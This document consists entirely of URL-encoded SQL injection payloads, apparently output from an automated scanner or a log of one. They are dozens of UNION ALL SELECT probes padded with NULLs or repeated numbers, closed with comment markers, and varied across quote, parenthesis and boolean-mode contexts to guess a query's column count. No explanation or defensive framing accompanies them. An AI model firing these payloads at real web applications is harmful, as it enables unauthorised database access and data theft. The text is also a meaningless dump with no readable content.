foo%27%2B%28SELECT%20rnLz%20WHERE%202787%3D2787%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20biUz%20WHERE%203804%3D3804%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20JDzk%20WHERE%203287%3D3287%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20eHWd%20WHERE%204530%3D4530%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20CoYI%20WHERE%207249%3D7249%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20zGMx%20WHERE%202637%3D2637%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20CWTk%20WHERE%205076%3D5076%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27JONh%27%20WHERE%206969%3D6969%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27oaFK%27%20WHERE%203539%3D3539%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27fMZe%27%20WHERE%204493%3D4493%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27kqRB%27%20WHERE%205440%3D5440%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27XJxl%27%20WHERE%203724%3D3724%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27uPCT%27%20WHERE%205041%3D5041%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27fiQG%27%20WHERE%204319%3D4319%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27QJya%27%20WHERE%201209%3D1209%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27abDt%27%20WHERE%207471%3D7471%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27Gulp%27%20WHERE%201194%3D1194%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 -4967%29%20UNION%20ALL%20SELECT%207081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%23 -7686%29%20UNION%20ALL%20SELECT%204846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%23 -5669%29%20UNION%20ALL%20SELECT%206249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%2C6249%23 -7187%29%20UNION%20ALL%20SELECT%205801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%2C5801%23 -1662%29%20UNION%20ALL%20SELECT%202331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%2C2331%23 -7145%29%20UNION%20ALL%20SELECT%208005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%2C8005%23 -9838%29%20UNION%20ALL%20SELECT%202886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%23 -2683%29%20UNION%20ALL%20SELECT%201777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%2C1777%23 -7735%29%20UNION%20ALL%20SELECT%207287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%23 -6512%29%20UNION%20ALL%20SELECT%207962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%2C7962%23 -2762%27%29%20UNION%20ALL%20SELECT%209246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%23 -4496%27%29%20UNION%20ALL%20SELECT%201988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%23 -9982%27%29%20UNION%20ALL%20SELECT%202470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%2C2470%23 -7271%27%29%20UNION%20ALL%20SELECT%205128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%2C5128%23 -7084%27%29%20UNION%20ALL%20SELECT%202778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%2C2778%23 -7501%27%29%20UNION%20ALL%20SELECT%203035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%2C3035%23 -5154%27%29%20UNION%20ALL%20SELECT%205584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%23 -1072%27%29%20UNION%20ALL%20SELECT%202643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%2C2643%23 -8426%27%29%20UNION%20ALL%20SELECT%203831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%23 -7772%27%29%20UNION%20ALL%20SELECT%206239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%23 -4135%27%20UNION%20ALL%20SELECT%207155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%2C7155%23 -5626%27%20UNION%20ALL%20SELECT%208953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%23 -4136%27%20UNION%20ALL%20SELECT%209557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%2C9557%23 -2162%27%20UNION%20ALL%20SELECT%206629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%2C6629%23 -4714%27%20UNION%20ALL%20SELECT%206084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%2C6084%23 